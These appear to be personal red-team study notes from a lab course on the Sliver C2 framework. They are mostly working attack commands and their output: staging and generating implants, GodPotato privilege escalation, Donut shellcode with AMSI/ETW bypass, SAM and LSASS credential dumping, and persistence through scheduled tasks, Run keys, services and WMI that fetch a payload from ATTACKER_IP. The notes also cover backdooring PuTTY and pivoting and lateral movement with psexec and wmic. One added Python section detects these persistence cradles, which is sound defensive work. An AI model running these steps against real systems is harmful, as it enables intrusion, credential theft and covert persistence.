Sliver is a command and control (C2) framework developed by Bishop Fox. Used by penetration testers and red teamers, its client, server, and implants are written in Go, which makes them easy to cross-compile for different platforms.
Sliver works with implants, beacons, and stagers. Implants are the binaries deployed on a target to maintain access, controlled through the command and control server. Beaconing is the implant calling back from the target host to the C2 server at a set interval. A stager is a small piece of code executed on the remote machine whose only job is to load a larger payload (the actual implant).
Usage
Sliver C2 Deployment
Stager
Diagram explaining the communication flow between the victim and the attacker’s C2 infrastructure:
```mermaid
sequenceDiagram
    participant V as Victim Server (IIS)
    participant 8088 as Attacker:8088<br>(Stager Host / HTTP Server)
    participant 4443 as Attacker:4443<br>(C2 Listener / TCP)
    Note over V: Initial Compromise
    V->>8088: 1. HTTP Request (GET /)<br>Triggered by accessing uploaded sliver.aspx
    8088->>V: 2. HTTP Response (Sliver Implant Shellcode)
    Note over V: Stager executes the downloaded shellcode
    V->>4443: 3. TCP Handshake & Secure Session<br>Initial Beacon Check-in
    4443->>V: 4. C2 Instructions (Tasks/Jobs)
    loop C2 Communication
        V->>4443: Beacon Request (Get Tasks)
        4443->>V: Task Response (e.g., run whoami)
        V->>4443: Task Output (Result of whoami)
    end
```
- Port 8088 (HTTP): Handles the initial stage download. This is a simple, one-time transaction where the web shell (sliver.aspx) fetches the actual implant code from the attacker's server.
- Port 4443 (TCP): Manages the persistent C2 channel. After the implant is in memory, it establishes a secure, encrypted TCP session to this port for receiving tasks and sending back results.
```
# Create implant profile: the implant built from it calls back over HTTP to 10.10.16.13:8088
sliver > profiles new --http 10.10.16.13:8088 --format shellcode htb
# Stage listener: serves the implant built from the 'htb' profile to stagers that connect on tcp/4443
sliver > stage-listener --url tcp://10.10.16.13:4443 --profile htb
# HTTP C2 listener on 8088 (the callback address set in the profile)
sliver > http -L 10.10.16.13 -l 8088
# Generate the stager (this actually uses msfvenom under the hood)
sliver > generate stager --lhost 10.10.16.13 --lport 4443 --format csharp --save staged.txt
```
Privilege Escalation with Sliver C2
- The goal is to elevate access from a standard user to a higher-privileged account (e.g., SYSTEM or Administrator).
- OPSEC is crucial: activities must be performed stealthily to avoid triggering security alerts.
Extending Sliver: Aliases & Extensions
Sliver’s functionality can be extended beyond its built-in commands.
| Feature | Description | Key Command |
|---|---|---|
| Alias | A wrapper that sideloads and executes a shared library in memory within a remote process. | sideload |
| Extension | Native code artifacts loaded by the implant to return data to the C2 server. | Similar to aliases. |
| .NET Execution | Runs a .NET binary remotely in a child process. | execute-assembly |
Enumeration Tools
Gathering system information is the first step to identifying privilege escalation vectors.
1. Seatbelt
A C# tool for comprehensive system enumeration.
Installation via Armory:
```
# Seatbelt is installed via Sliver's Armory
armory install seatbelt
```
Execution in Sliver:
```
# Using the integrated alias (note the '--')
sliver (HIGH_RISER) > seatbelt -- -group=all
# Using execute-assembly with a local binary
sliver (HIGH_RISER) > execute-assembly /path/to/Seatbelt.exe -group=system
```
- OPSEC Note: The execute-assembly command spawns a sacrificial process (notepad.exe by default). This can be changed with the --process flag.
2. SharpUp
A C# port of PowerUp for privilege escalation vulnerability assessment.
Execution in Sliver:
```
sliver (HIGH_RISER) > sharpup -- audit
```
Example Output & Analysis:
```
=== Abusable Token Privileges ===
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
```
- The presence of SeImpersonatePrivilege is a common privilege escalation vector, especially for service accounts (like an IIS app pool account).
Exploitation: Abusing SeImpersonatePrivilege
GodPotato
An exploit tool that leverages SeImpersonatePrivilege to gain SYSTEM privileges on Windows 11, Server 2022, and older versions.
Basic Usage to Test Privileges:
```
sliver (HIGH_RISER) > execute-assembly /path/to/GodPotato-NET4.exe -cmd "whoami"
[*] Output:
...
nt authority\system
```
Advanced Tradecraft: In-Memory Execution with Donut
Donut generates shellcode from a .NET assembly, allowing it to be executed entirely in memory.
1. Setup Donut
```bash
git clone https://github.com/TheWover/donut
cd donut/
make -f Makefile
```
2. Prepare a Beacon
A beacon is required for the payload to call back to.
```
# Generate an HTTP beacon
sliver (HIGH_RISER) > generate beacon --http YOUR_IP:PORT --skip-symbols -N http-beacon
# Upload the beacon to the target
sliver (HIGH_RISER) > upload http-beacon.exe c:\temp\
```
3. Start the Listener
```
sliver (HIGH_RISER) > http --lhost YOUR_IP --lport PORT
```
4. Generate Shellcode with Donut
```bash
./donut -i /path/to/GodPotato-NET4.exe -a 2 -b 2 -p '-cmd c:\temp\http-beacon.exe' -o godpotato.bin
```
- -a 2: Architecture is amd64.
- -b 2: Bypass AMSI/WLDP/ETW (abort on fail).
- -p: Arguments to pass to the generated shellcode (the command for GodPotato to run).
5. Create a Sacrificial Process
Spawn a process to host the shellcode, avoiding crashes in critical applications.
```
sliver (HIGH_RISER) > execute-assembly /path/to/Rubeus.exe createnetonly /program:C:\\windows\\system32\\notepad.exe
[+] ProcessID : 5668
```
6. Execute the Shellcode
Inject the Donut shellcode into the sacrificial process.
```
sliver (HIGH_RISER) > execute-shellcode -p 5668 /path/to/godpotato.bin
```
7. Receive the SYSTEM Beacon
After successful execution, a new beacon callback from the SYSTEM user will be established.
```
sliver (HIGH_RISER) > beacons
ID         Name          Transport   Remote Address          Hostname   Username              Operating System
========== ============= =========== ====================== ========== ===================== ==================
46d73efb   http-beacon   http(s)     10.129.205.226:50838   web01      NT AUTHORITY\SYSTEM   windows/amd64
```
Beacon vs. Session Management
- Beacons are asynchronous. Commands are queued and executed at the beacon's check-in interval.
- Use the tasks command to monitor the status of executed commands.
- To interact with a beacon, use the use command with its ID:
```
sliver (HIGH_RISER) > use 46d
sliver (beacon) >
```
- A beacon can be upgraded to an interactive session using the interactive command, which provides real-time command execution.
Privilege Escalation, Credential Access & Persistence
Credential Dumping Techniques
1. SAM Database Extraction (Requires SYSTEM)
```
# From a SYSTEM-level beacon/session
hashdump
# Example output:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:e368973bdcf9dd5219882fdf0777ff0b:::
# (NTLM hash: e368973bdcf9dd5219882fdf0777ff0b)
```
2. LSASS Process Memory Dumping
```
# Find LSASS process ID
ps -e lsass
# Dump LSASS process memory (requires elevated privileges)
procdump --pid <LSASS_PID> --save /tmp/lsass.dmp
# Analyze dump offline with pypykatz
pypykatz lsa minidump /tmp/lsass.dmp
```
OPSEC Considerations:
- LSASS dumping is highly detectable by modern EDR/AV solutions.
- Prefer SAM dumping when possible.
- Use alternative techniques like SSP or COM object abuse in sensitive environments.
3. LSA Secrets Extraction
```
# Using built-in Sliver capabilities or external tools
# (May require SYSTEM privileges)
# reg save takes the key and the output file as two separate arguments
reg save HKLM\SECURITY SECURITY.save
reg save HKLM\SYSTEM SYSTEM.save
```
Establishing Persistence Mechanisms
1. Scheduled Tasks
```bash
# Create Base64-encoded PowerShell payload (PowerShell -enc expects base64 of UTF-16LE text)
echo -en "iex(new-object net.webclient).downloadString('http://ATTACKER_IP:8088/stager.txt')" | iconv -t UTF-16LE | base64 -w 0
```
```
# Create scheduled task running as SYSTEM
execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater /tr "powershell.exe -enc BASE64_PAYLOAD" /ru SYSTEM'
```
2. Startup Folder Persistence
```
# Using SharPersist to create malicious LNK file
sharpersist -- -t startupfolder -c \"powershell.exe\" -a \"-nop -w hidden iex(new-object net.webclient).downloadstring(\'http://ATTACKER_IP:8088/stager.txt\')\" -f \"Edge Updater\" -m add
# Location: C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
```
3. Registry Run Keys
```
# Current User Run key (HKCU - no admin needed)
sharpersist -- -t reg -c \"powershell.exe\" -a \"-nop -w hidden iex(new-object net.webclient).downloadstring(\'http://ATTACKER_IP:8088/stager.txt\')\" -k \"hkcurun\" -v \"UserPersistence\" -m add
# Local Machine Run key (HKLM - requires admin)
sharpersist -- -t reg -c \"powershell.exe\" -a \"-nop -w hidden iex(new-object net.webclient).downloadstring(\'http://ATTACKER_IP:8088/stager.txt\')\" -k \"hklmrun\" -v \"SystemPersistence\" -m add
```
4. Service Creation
```
# Create a new service for persistence
execute sc create PersistentService binPath= "C:\Windows\System32\cmd.exe /c powershell -ep bypass -c iex((new-object net.webclient).downloadstring('http://ATTACKER_IP:8088/stager.txt'))" start= auto
# Start the service
execute sc start PersistentService
```
Application Backdooring
1. Backdooring Legitimate Executables
```
# Create shellcode profile for persistence
profiles new --format shellcode --http ATTACKER_IP:9002 persistence-shellcode
# Start listener for backdoored applications
http -L ATTACKER_IP -l 9002
# Backdoor target application (e.g., PuTTY)
backdoor --profile persistence-shellcode "C:\Program Files\PuTTY\putty.exe"
```
2. WMI Event Subscription
```powershell
# Create WMI event subscription for persistence
$FilterArgs = @{
    Name = 'PersistenceFilter'
    EventNameSpace = 'root\cimv2'
    QueryLanguage = 'WQL'
    Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'explorer.exe'"
}
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $FilterArgs
$ConsumerArgs = @{
    Name = 'PersistenceConsumer'
    CommandLineTemplate = "powershell.exe -nop -w hidden -c iex((new-object net.webclient).downloadstring('http://ATTACKER_IP:8088/stager.txt'))"
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{
    Filter = $Filter
    Consumer = $Consumer
}
```
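Every persistence mechanism above (scheduled task, Startup folder, Run keys, service binPath, WMI consumer) ends up storing the same PowerShell download cradle somewhere an administrator can enumerate. As an added defender-side example that is not part of the original notes, the check below takes constructed entries modelled on those commands, decodes a `-enc` argument the way the schtasks step builds it (base64 of UTF-16LE), and reports which cradle indicators each entry carries; the entry list, indicator names and regexes are my own assumptions.

```python
import base64
import re
from typing import List, Optional, Tuple

# Indicator patterns drawn from the cradles used in the persistence commands
# (constructed for this example; matched against lowercased text).
CRADLE_PATTERNS = {
    "iex": r"\biex\b",
    "downloadstring": r"downloadstring",
    "webclient": r"net\.webclient",
    "hidden-window": r"-w(?:indowstyle)?\s+hidden",
    "no-profile": r"-nop(?:rofile)?\b",
    "ep-bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
}
ENC_RE = re.compile(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode the script behind a -enc/-EncodedCommand argument (base64 of UTF-16LE)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmdline: str) -> List[str]:
    """Return the indicator names present in a command line, decoding -enc first if needed."""
    hits: List[str] = []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded-command")
        text = f"{cmdline} {decoded}"   # scan the visible and the decoded part together
    low = text.lower()
    hits.extend(name for name, pat in CRADLE_PATTERNS.items() if re.search(pat, low))
    return hits


def audit_persistence(entries: List[Tuple[str, str]]) -> List[Tuple[str, List[str]]]:
    """entries are (location, command) pairs; returns only the suspicious ones with their hits."""
    findings = []
    for location, cmd in entries:
        hits = score_command(cmd)
        if hits:
            findings.append((location, hits))
    return findings


# Constructed sample entries mirroring the persistence commands above (not real telemetry).
CRADLE = "iex(new-object net.webclient).downloadString('http://ATTACKER_IP:8088/stager.txt')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode()
SAMPLE_ENTRIES = [
    ("schtasks:SecurityUpdater", f"powershell.exe -enc {ENCODED}"),
    ("HKCU\\...\\Run\\UserPersistence", f"powershell.exe -nop -w hidden {CRADLE}"),
    ("WMI:CommandLineEventConsumer/PersistenceConsumer", f"powershell.exe -nop -w hidden -c {CRADLE}"),
    ("service:PersistentService", f"C:\\Windows\\System32\\cmd.exe /c powershell -ep bypass -c {CRADLE}"),
    ("HKLM\\...\\Run\\SecurityHealth", "C:\\Windows\\system32\\SecurityHealthSystray.exe"),
]

if __name__ == "__main__":
    for location, hits in audit_persistence(SAMPLE_ENTRIES):
        print(f"{location}: {', '.join(hits)}")
```

The benign Run-key entry produces no hits, while the four entries built from the commands above are all reported, with the scheduled task only becoming visible once its `-enc` payload is decoded.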
Pivoting and Tunneling
While following the Intro to C2 Operations with Sliver course, there is a section that teaches pivoting with Chisel and ProxyChains, and I really cannot stand either of them. I was looking for a way to use Ligolo-ng instead, and luckily there is a solution: https://github.com/KriyosArcane/sliver-ligolo-ng
There is not much difference from normal Ligolo-ng usage; there are just a few extra steps so that Sliver can push the agent binary from our machine and execute it on the target to establish the connection.
```bash
git clone https://github.com/KriyosArcane/sliver-ligolo-ng.git
cd sliver-ligolo-ng
make
```
The built files will be automatically copied to ~/.sliver-client/aliases/ligolo-ng.
```bash
# Create the tun interface the proxy will route through
ip tuntap add user $USER mode tun ligolo
ip link set ligolo up
# Start ligolo-ng
ligolo-ng -selfcert
```
In a Sliver session (I'm not sure whether it works for beacons or not):
```
[server] sliver (http-beacon-9001) > aliases load /root/.sliver-client/aliases/ligolo-ng/alias.json
[*] Ligolo-ng alias has been loaded
[server] sliver (http-beacon-9001) > ligolo-ng -- -connect 10.10.16.13:11601 -ignore-cert
```
```
# On ligolo-ng
$ ligolo-ng -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
ERRO[0000] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate
INFO[0000] Listening on 0.0.0.0:11601
Version: dev
ligolo-ng » INFO[0084] Agent joined. id=785861f3-2674-4683-8ebd-c8a027a6bee1 name="CHILD\\eric@web01" remote="10.129.205.234:49926"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - CHILD\eric@web01 - 10.129.205.234:49926 - 785861f3-2674-4683-8ebd-c8a027a6bee1
[Agent : CHILD\eric@web01] » start
[Agent : CHILD\eric@web01] » INFO[0324] Starting tunnel to CHILD\eric@web01 (785861f3-2674-4683-8ebd-c8a027a6bee1)
```
Test with netexec:
```
$ nxc smb 172.16.1.12 -u svc_sql -p 'jkhnrjk123!'
SMB  172.16.1.12  445  SRV01  [*] Windows 10 / Server 2019 Build 17763 x64 (name:SRV01) (domain:child.htb.local) (signing:False) (SMBv1:False)
SMB  172.16.1.12  445  SRV01  [+] child.htb.local\svc_sql:jkhnrjk123! (admin)
```
Lateral Movement
Using PsExec
To reach SRV01 with the credentials above, we need to create a new logon session with the make-token utility, which lets us impersonate a user. Other utilities such as impersonate and runas can also be used to obtain an authenticated session, and the same can be achieved through a sacrificial process started with the help of Rubeus.
```
sliver (http-beacon) > make-token -u svc_sql -d child.htb.local -p jkhnrjk123!
[*] Successfully impersonated child.htb.local\svc_sql. Use `rev2self` to revert to your previous token.
```
Having impersonated the svc_sql user, we can test our access to the resources on SRV01 by listing the contents of the C:\ directory.
```
sliver (http-beacon) > ls //srv01.child.htb.local/c$
\\srv01.child.htb.local\c$\ (12 items, 704.0 MiB)
=================================================
drwxrwxrwx  $Recycle.Bin                    <dir>      Wed Sep 14 11:55:41 -0700 2022
Lrw-rw-rw-  Documents and Settings -> C:\Users  0 B    Tue Sep 13 11:58:35 -0700 2022
-rw-rw-rw-  pagefile.sys                    704.0 MiB  Tue Oct 31 10:51:23 -0700 2023
drwxrwxrwx  PerfLogs                        <dir>      Sat Sep 15 00:19:00 -0700 2018
dr-xr-xr-x  Program Files                   <dir>      Wed Jul 19 06:40:02 -0700 2023
drwxrwxrwx  Program Files (x86)             <dir>      Wed Sep 14 11:04:07 -0700 2022
drwxrwxrwx  ProgramData                     <dir>      Wed Jul 19 06:40:02 -0700 2023
drwxrwxrwx  Recovery                        <dir>      Tue Sep 13 11:58:41 -0700 2022
drwxrwxrwx  SQL2019                         <dir>      Wed Sep 14 10:46:10 -0700 2022
drwxrwxrwx  System Volume Information       <dir>      Tue Sep 13 12:19:00 -0700 2022
dr-xr-xr-x  Users                           <dir>      Wed Sep 14 11:55:36 -0700 2022
drwxrwxrwx  Windows                         <dir>      Sat Oct 15 14:14:52 -0700 2022
```
As seen from the output, we have successfully verified our access using svc_sql's session (credentials) on SRV01.
Before we run the psexec utility, a pivot listener is needed as it will be used to communicate between SRV01 → WEB01. Simply put, as SRV01 cannot directly communicate to us, SRV01 will communicate to WEB01 from which the chain of communication will be established. The pivots utility supports tcp pivot listener(s) and named-pipe listener(s).
The tcp pivot listener requires a bind address to be specified, which in our case is the IP address of WEB01 (172.16.1.11 internal); by default, every tcp pivot listener will listen on port 9898.
```
sliver (http-beacon) > pivots tcp --bind 172.16.1.11
[*] Started tcp pivot listener 172.16.1.11:9898 with id 1
```
With the pivot listener started and in place, we need to proceed with creating an implant; for psexec, the implant must be in service format. Again, we will disable symbol obfuscation, and we will use arbitrary names for the service and its description, with the intent of blending in. By default, the service name is Sliver and the description is Sliver implant. The pivots command can be used to display the current pivot listeners.
```
sliver (http-beacon) > generate --format service -i 172.16.1.11:9898 --skip-symbols -N psexec-pivot
[*] Generating new windows/amd64 implant binary
[!] Symbol obfuscation is disabled
[*] Build completed in 3s
[*] Implant saved to /home/htb-ac590/psexec-pivot.exe
```
Jumping into the psexec utility, we must specify the path of the implant's binary.
```
sliver (http-beacon) > psexec --custom-exe /home/htb-ac590/psexec-pivot.exe --service-name Teams --service-description MicrosoftTeaams srv01.child.htb.local
[*] Uploaded service binary to \\srv01.child.htb.local\C$\windows\temp\51gramfp.exe
[*] Waiting a bit for the file to be analyzed ...
[*] Successfully started service on srv01.child.htb.local (c:\windows\temp\51gramfp.exe)
[*] Successfully removed service Teams on srv01.child.htb.local
[*] Session 23471b15 psexec-pivot - 10.129.205.234:49721->http-beacon-> (srv01) - windows/amd64 - Tue, 31 Oct 2023 11:43:48 GMT
sliver (http-beacon) > sessions
ID         Name           Transport   Remote Address                        Hostname   Username              Operating System   Locale   Last Message                              Health
========== ============== =========== ===================================== ========== ===================== ================== ======== ======================================= =========
23471b15   psexec-pivot   pivot       10.129.205.234:49721->http-beacon->   srv01      NT AUTHORITY\SYSTEM   windows/amd64      en-US    Tue Oct 31 11:43:48 GMT 2023 (5s ago)   [ALIVE]
41e2012e   http-beacon    http(s)     10.129.205.234:49721                  web01      CHILD\eric            windows/amd64      en-US    Tue Oct 31 11:43:51 GMT 2023 (2s ago)   [ALIVE]
sliver (http-beacon) > pivots
ID   Protocol   Bind Address       Number Of Pivots
==== ========== ================== ==================
1    TCP        172.16.1.11:9898   1
```
Using WMIC
WMIC (the Windows Management Instrumentation command-line utility) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. System administrators can write VBScript or PowerShell scripts to manage Windows machines locally and remotely. WMI is also a native means of lateral movement and remote code execution; it requires local administrator privileges.
Proceed to generate an implant through Sliver:
```
sliver (http-beacon) > generate -i 172.16.1.11:9898 --skip-symbols -N wmicpivot
[*] Generating new windows/amd64 implant binary
[!] Symbol obfuscation is disabled
[*] Build completed in 3s
[*] Implant saved to /home/htb-ac590/wmicpivot.exe
```
Right after having the implant generated, we proceed by creating a logon session using make-token as explained earlier, and we need to upload the binary to disk on SRV02.
```
sliver (http-beacon) > make-token -u svc_sql -d child.htb.local -p jkhnrjk123!
[*] Successfully impersonated child.htb.local\svc_sql. Use `rev2self` to revert to your previous token.
sliver (http-beacon) > cd //srv02.child.htb.local/c$/windows/tasks
[*] \\srv02.child.htb.local\c$\windows\tasks
sliver (http-beacon) > upload wmicpivot.exe
[*] Wrote file to \\srv02.child.htb.local\c$\windows\tasks\wmicpivot.exe
sliver (http-beacon) > rev2self
[*] Back to self...
```
We can execute the wmic command to start the implant on the remote host SRV02 via the beacon/session on WEB01.
```
wmic /node:172.16.1.13 /user:svc_sql /password:jkhnrjk123! process call create "C:\\windows\\tasks\\wmicpivot.exe"
```
The above command can be executed via a PowerShell terminal on WEB01 or through the beacon.
```
sliver (http-beacon) > execute -o wmic /node:172.16.1.13 /user:svc_sql /password:jkhnrjk123! process call create "C:\\windows\\tasks\\wmicpivot.exe"
[*] Output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 1128;
        ReturnValue = 0;
};
[*] Stderr:
```
Having executed the command, the implant takes advantage of the pivot listener we started earlier on port 9898 and connects back to WEB01.
```
[*] Session d35ddf7e wmicpivot - 10.129.205.234:49715->http-beacon-> (srv02) - windows/amd64 - Wed, 08 Nov 2023 08:43:20 GMT
sliver (http-beacon) > pivots
ID   Protocol   Bind Address       Number Of Pivots
==== ========== ================== ==================
1    TCP        172.16.1.11:9898   1
sliver (http-beacon) > sessions
ID         Name          Transport   Remote Address                        Hostname   Username        Operating System   Locale   Last Message                               Health
========== ============= =========== ===================================== ========== =============== ================== ======== ======================================== =========
d35ddf7e   wmicpivot     pivot       10.129.205.234:49715->http-beacon->   srv02      CHILD\svc_sql   windows/amd64      en-US    Wed Nov 8 08:43:20 GMT 2023 (15s ago)    [ALIVE]
b1ee85c3   http-beacon   http(s)     10.129.205.234:49715                  web01      CHILD\eric      windows/amd64      en-US    Wed Nov 8 08:43:33 GMT 2023 (2s ago)     [ALIVE]
```